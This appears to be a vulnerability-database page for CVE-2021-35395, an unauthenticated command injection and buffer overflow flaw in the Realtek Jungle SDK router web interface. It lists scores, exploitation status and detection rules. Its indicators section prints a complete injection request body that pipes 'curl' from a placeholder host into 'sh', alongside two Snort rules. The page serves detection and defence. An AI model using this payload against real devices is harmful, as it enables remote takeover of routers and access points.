cbcvebase.
CVE-2021-35395
published 2021-08-16

CVE-2021-35395: Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two…

PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2021-11-17
Exploited in the wild
EPSS
98.10%
99.9th percentile
Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exists: one based on Go-Ahead named webs and another based on Boa named boa. Both of them are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues: - stack buffer overflow in formRebootCheck due to unsafe copy of submit-url parameter - stack buffer overflow in formWsc due to unsafe copy of submit-url parameter - stack buffer overflow in formWlanMultipleAP due to unsafe copy of submit-url parameter - stack buffer overflow in formWlSiteSurvey due to unsafe copy of ifname parameter - stack buffer overflow in formStaticDHCP due to unsafe copy of hostname parameter - stack buffer overflow in formWsc due to unsafe copy of 'peerPin' parameter - arbitrary command execution in formSysCmd via the sysCmd parameter - arbitrary command injection in formWsc via the 'peerPin' parameter Exploitability of identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK webserver. Some vendors use it as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK webserver will probably contains its own set of issues on top of the Realtek ones (if kept). Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.

Affected

1 ranges
VendorProductVersion rangeFixed in
realtekrtl819x_jungle_software_development_kit2.0 – 3.4.14b

Detection & IOCsextracted from sources · hover to see the quote

url/goform/formWsc
url/formSysCmd
commandsubmit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35395)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/formSysCmd"; fast_pattern; endswith; http.request_body; content:"sysCmd="; reference:url,www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/; reference:cve,2021-35395; classtype:attempted-user; sid:2033839; rev:2; metadata:attack_target Server, created_at 2021_08_30, cve CVE_2021_35395, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_08_30, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Realtek SDK - Command Injection Inbound (CVE-2021-35395)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/formWsc"; fast_pattern; endswith; http.request_body; content:"peerPin="; content:"|3b|"; within:50; reference:url,www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/; reference:cve,2021-35395; classtype:attempted-user; sid:2033840; rev:3; metadata:attack_target Server, created_at 2021_08_30, cve CVE_2021_35395, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
bytes
|3b|
  • Detect POST requests to /goform/formWsc with 'peerPin=' in the body followed by a semicolon (|3b|) within 50 bytes — indicates command injection attempt via the peerPin parameter
  • Detect POST requests to /formSysCmd with 'sysCmd=' in the body — indicates arbitrary command execution attempt via the sysCmd parameter
  • The exploit payload uses shell command injection via peerPin, e.g. appending ';curl http://<url> | sh;' after a valid-looking PIN value
  • Both 'webs' (Go-Ahead based) and 'boa' (Boa-based) HTTP management interface binaries are affected; monitor for POST requests to formWsc, formSysCmd, formRebootCheck, formWlanMultipleAP, formWlSiteSurvey, and formStaticDHCP endpoints
  • Exploitation is unauthenticated and network-accessible (CVSS AV:N/AC:L/PR:N); treat any inbound POST to the affected form endpoints from untrusted sources as high-priority alert
  • ·Custom vendor code built on the Realtek SDK may introduce additional vulnerabilities beyond the base Realtek ones, even if original handlers were removed

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.